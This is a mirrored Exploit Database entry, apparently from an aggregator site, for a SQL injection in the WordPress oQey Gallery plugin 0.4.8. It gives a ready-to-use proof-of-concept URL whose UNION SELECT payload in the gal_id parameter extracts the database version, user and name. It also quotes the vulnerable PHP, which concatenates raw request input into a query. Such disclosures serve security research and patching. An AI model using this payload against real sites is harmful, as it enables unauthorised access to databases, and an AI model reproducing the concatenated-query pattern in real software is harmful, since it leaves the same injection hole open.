WordPress Plugin oQey Gallery 0.4.8 – SQL Injection

Exploit Database
8 阅读

作者： Miroslav Stampar

日期： 2011-09-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17779/

# Exploit Title: WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability
# Date: 2011-09-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/oqey-gallery.0.4.8.zip
# Version: 0.4.8 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/oqey-gallery/getimages.php?gal_id=0' UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23

---------------
Vulnerable code
---------------
if(isset($_REQUEST['gal_id'])){
...
$data = explode("-", $_REQUEST['gal_id']);
$id = $data[0];
...
$s = $wpdb->get_row("SELECT * FROM $oqey_galls WHERE id ='".$id."' ");

last Exploits
WordPress Plugin oQey Gallery 0.4.8 – SQL Injection的更多信息

Itech Travel Portal Script 9.33 – SQL Injection：
MobileCartly 1.0 – Arbitrary File Deletion：
WordPress Plugin Global Flash Gallery – ‘swfupload.php’ Arbitrary File Upload：
PHPFox 3.0.1 – ‘ajax.php’ Multiple Cross-Site Scripting Vulnerabilities：
CMS By SoftnSolv – ‘index.php’ SQL Injection：
Xerox DocuShare – SQL Injection：
OneFileCMS 1.1.5 – Local File Inclusion：
Vivotek IP Cameras – Multiple Vulnerabilities：